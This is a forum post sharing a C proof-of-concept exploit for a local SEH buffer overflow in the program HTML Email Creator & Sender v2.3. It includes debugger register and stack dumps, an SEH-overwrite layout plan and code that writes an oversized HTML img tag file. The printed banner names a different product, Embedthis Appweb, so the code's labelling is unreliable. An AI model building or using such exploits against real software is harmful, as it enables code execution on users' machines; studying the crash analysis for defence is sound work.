Jump to content
fl0 fl0w

0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc

Recommended Posts

Salut bro's ,got 0F**gday


/*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc
********************************************************************
Debugging info
Seh handler is overwriten , the offset is at 60 bytes in our buffer
so you have to build your buffer as follows:
[PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE]
| | | |
JMP 4 bytes POP POP RET 50*0x90 calc.exe
*********************************************************************
*/

/*
Code execution is possible.
CPU Registers
EAX 00000000
ECX 00000208
EDX 00000000
EBX 00000029
ESP 0012E224
EBP 7C8101B1 kernel32.lstrcpynA
ESI 90909090 <------------------CONTROLED
EDI 00001209
EIP 0042E1C7 HtmlEmai.0042E1C7

ESP points to 0012E224
Stack looks like
0012E224 90909090
0012E228 00000029 )...
0012E22C 00415D56 V]A. RETURN to HtmlEmai.00415D56 from HtmlEmai.0042E1BF
0012E230 00000208 ..
0012E234 003F9758 X—?.
0012E238 003FBD19 ½?.
0012E23C 00000000 ....
0012E240 00000029 )...
0012E244 90909090
0012E248 90909090
0012E24C 90909090
0012E250 90909090
0012E254 90909090
0012E258 90909090
0012E25C 90909090
0012E260 90909090
0012E264 90909090
0012E268 90909090
0012E26C 90909090
0012E270 90909090
0012E274 90909090
0012E278 90909090
0012E27C 909011EB ë
0012E280 41414141 AAAA
0012E284 90909090
0012E288 90909090
0012E28C 90909090
0012E290 90909090
0012E294 90909090
0012E298 90909090
0012E29C 90909090
0012E2A0 90909090
0012E2A4 90909090
0012E2A8 90909090
0012E2AC EB5903EB ëYë
0012E2B0 FFF8E805 èøÿ
0012E2B4 4949FFFF ÿÿII
0012E2B8 49494949 IIII
0012E2BC 49494949 IIII
0012E2C0 49494949 IIII
0012E2C4 51494949 IIIQ
0012E2C8 636A375A Z7jc
0012E2CC 30423058 X0B0
0012E2D0 426B4250 PBkB
0012E2D4 42417341 AsAB
0012E2D8 32414232 2BA2
0012E2DC 41304141 AA0A
0012E2E0 42385841 AX8B
0012E2E4 38755042 BPu8
*/
/*
ASM Instructions
0042E1C7 |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <-------This is where goes wrong => DS:[90909090]=??? EAX=00000000
0042E1C9 |. 8378 F4 01 CMP DWORD PTR DS:[EAX-C],1
0042E1CD |. 8D58 F4 LEA EBX,DWORD PTR DS:[EAX-C]
0042E1D0 |. 7F 05 JG SHORT HtmlEmai.0042E1D7
EAX is writen with DWORD NULL byte.
*/
/*
Seh Chain
0012E894 909011EB ë Pointer to next SEH record <------ overwrite with this "\xEb\x04\x90\x90"
0012E898 41414141 AAAA SE handler <-----POP POP RET
*/
#include <stdio.h>
#include <windows.h>
#include <string.h>
#include <getopt.h>
#include <stdint.h>
typedef struct Start {
uint8_t sh;
uint8_t st;
uint8_t sm;
uint8_t sl;
}HTML;

typedef struct Middle {
uint8_t sh;
uint8_t se;
uint8_t sa;
uint8_t sd;
}HEAD;

typedef struct End {
uint8_t sb;
uint8_t so;
uint8_t sD;
uint8_t sy;
}BODY;
#define BUFFERSIZE 0x1A0A
#define FILESIZE 29A
#define SRC "<img src="
void Fbuild(char *fname)
{ HTML *ht_ml;
HEAD *he_ad;
BODY *bo_dy;
char *memBuffer;
//"\x48\x54\x4D\x4C" -html
ht_ml = (HTML*)malloc(sizeof(HTML));
he_ad = (HEAD*)malloc(sizeof(HEAD));
bo_dy = (BODY*)malloc(sizeof(BODY));
memBuffer = (char*)malloc(BUFFERSIZE);
if(ht_ml == NULL || he_ad == NULL || bo_dy == NULL || memBuffer == NULL) {
exit(-1);
}
ht_ml->sh = 0x48;
ht_ml->st = 0x54;
ht_ml->sm = 0x4D;
ht_ml->sl = 0x4C;
//second structure
//HEAD "\x48\x45\x41\x44"
he_ad->sh = 0x48;
he_ad->se = 0x45;
he_ad->sa = 0x41;
he_ad->sd = 0x44;
//thierd structure
//"\x42\x4F\x44\x59"
bo_dy->sb = 0x42;
bo_dy->so = 0x4F;
bo_dy->sD = 0x44;
bo_dy->sy = 0x59;
FILE *f;
f = fopen(fname, "w");
if( f == NULL) {
exit(-1);
}
int32_t offset = 0;
memcpy(memBuffer, "<", 1);
offset += 1;
memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml));
offset += sizeof(ht_ml);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, he_ad, sizeof(he_ad));
offset += sizeof(he_ad);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, "\\", 1);
offset += 1;
memcpy(memBuffer+offset, he_ad, sizeof(he_ad));
offset += sizeof(he_ad);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy));
offset += sizeof(bo_dy);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
uint8_t shit[] ={ 0x3C,0x69,0x6D,0x67,0x20,0x73,0x72,0x63,0x3D };
memcpy(memBuffer+offset, shit, sizeof(shit));
offset += sizeof(shit);
memset(memBuffer+offset, 0x22, 1);
offset += 1;
memset(memBuffer+offset, 0x41, 4616);
offset += 4616;
memset(memBuffer+offset, 0x22, 1);
offset += 1;
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, "\\", 1);
offset += 1;
memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy));
offset += sizeof(bo_dy);
memcpy(memBuffer+offset, ">", 1);
offset += 1;
memcpy(memBuffer+offset, "<", 1);
offset += 1;
memcpy(memBuffer+offset, "\\", 1);
offset += 1;
memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml));
offset += sizeof(ht_ml);
memcpy(memBuffer+offset, ">", 1);
offset += 2;
fwrite(memBuffer, offset , 1, f);
fwrite("\x00", 1, 1, f);
printf("File Done!\n");
}
int main(int argc, char *argv[])
{ char *fname = argv[1];
system("CLS");
fprintf(stdout , ":: ::\n");
fprintf(stdout , "Embedthis Appweb Remote Stack Overflow POC\n");
fprintf(stdout , "All Credits:fl0 fl0w\n");
fprintf(stdout , ":: ::\n");
if(argc < 2) {
printf("Usage is %s filename.html\n", argv[0]);
exit(-1);
}
Fbuild(fname);
return 0;
}

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...